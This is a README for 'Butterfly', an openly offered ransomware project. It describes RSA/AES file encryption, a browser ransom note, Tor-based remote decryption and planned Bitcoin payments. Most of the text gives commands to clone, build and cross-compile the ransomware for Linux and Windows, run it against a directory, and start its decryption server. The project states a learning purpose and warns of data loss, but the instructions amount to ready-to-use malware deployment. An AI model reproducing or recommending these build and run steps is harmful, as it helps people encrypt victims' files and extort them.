Butterfly is a cryptographic ransomware with the following features
- Hybrid Encryption (RSA Asymmetric/AES Symmetric Encryption) ✔️
- Offline Encryption ✔️
- Supports multiple Operating Systems (Linux ✔️, Windows 🔄, MacOS ❌)
- Supports over 300 File Extensions ✔️
- Webserver bflyServerApp for a secure remote decryption ✔️
- Ransom Visualization with Browser ✔️ GUI ❌ Wallpaper ❌
- Decryption over a Tor Hidden Service ✔️
- Connection to the TOR Network ✔️
- Bitcoin Payments 🔄
Butterfly is a full-featured cryptographic ransomware application that irrevocably encrypts your data. This means careless
use leads to permanent data loss.
The main purpose for the butterfly project was to build knowledge related to the increased occurrence of ransomwares.
❗ Butterfly was never supposed to harm or threat other computers ❗
Install compilers for the toolchain
# GCC on Ubuntu
sudo apt-get install gcc g++
# Windows cross compiler for Ubuntu
sudo apt-get install mingw-w64
Install openssl and boost filesystem libraries
sudo apt-get install -y libssl-dev libboost-filesystem-dev
If you enable the logging definition with cmake you also need to install the boost logging library
sudo apt-get install -y libboost-log-dev
# Clone the repo and create the build_linux/ folder
git clone https://github.com/bierschi/butterfly.git && cd butterfly
mkdir build_linux && cd build_linux
# Execute cmake with options
cmake -DCMAKE_TOOLCHAIN_FILE=../linux.cmake ../
(cmake -DCMAKE_TOOLCHAIN_FILE=../linux.cmake -DUNITTESTS=ON -DLOGGING=ON ../)
# Build the binary
make
CMake Arguments
-DUNITTESTS=ON # Enables the Unit Tests
-DLOGGING=ON # Enables the boost logging framework
# Clone the repo and create the build_windows/ folder
git clone https://github.com/bierschi/butterfly.git && cd butterfly
mkdir build_windows && cd build_windows
# Execute cmake with options
cmake -DCMAKE_TOOLCHAIN_FILE=../windows.cmake ../
# Build the binary
make
Print the available arguments for butterfly
./butterfly --help
butterfly is a cryptographic ransomware
Usage:
butterfly --dir /home/butterfly/data/
butterfly --dir /home/butterfly/data/ --protected
butterfly --encrypt /home/butterfly/data/
butterfly --decrypt /home/butterfly/data/
butterfly --decrypt /home/butterfly/data/ --tor
butterfly --decrypt /home/butterfly/data/ --key /home/butterfly/butterfly/masterkeys/SPrivateRSA.pem
Options:
-d, --dir Directory path to start the cryptographic ransomware (Encryption+Visualization+Payment+Decryption)
-enc, --encrypt Encrypts all files in provided directory path and shows the ransom visualization
-dec, --decrypt Decrypts all files in provided directory path, if the request to the remote server was successful
-t, --tor Remote decryption over the TOR network
-k, --key Masterkey for the decryption, if the remote server is not used (Corresponds to the embedded server public key)
-p, --protected Saves all key files to the system (For manual decryption)
-c, --config Logger config path
-v, --version Show version information and quit
-h, --help Show this message and quit
butterfly homepage at: https://github.com/bierschi/butterfly
# Run the bflyServerApp for remote decryption
bflyServerApp --host 127.0.0.1 --port 8080 --key ../masterkeys/SPrivateRSA.pem
# Run the butterfly binary with --dir argument
./butterfly --dir /home/butterfly/data/
# Use butterfly with the --encrypt argument
./butterfly --encrypt /home/butterfly/data
# Run the bflyServerApp for remote decryption
bflyServerApp --host 127.0.0.1 --port 8080 --key ../masterkeys/SPrivateRSA.pem
# Use butterfly with the --decypt argument
./butterfly --decrypt /home/butterfly/data
Install GTest
sudo apt-get install libgtest-dev
cd /usr/src/gtest
sudo cmake CMakeLists.txt
sudo make
#copy or symlink libgtest.a and libgtest_main.a to your /usr/lib folder
sudo cp *.a /usr/lib
Enable the Unit Tests with
cmake -DCMAKE_TOOLCHAIN_FILE=../linux.cmake -DUNITTESTS=ON ../
List all tests
./butterflyUnitTests --gtest_list_tests
Run the butterfly units
./butterflyUnitTests
All changes and versioning information can be found in the CHANGELOG
Copyright (c) 2021 Bierschneider Christian. See LICENSE for details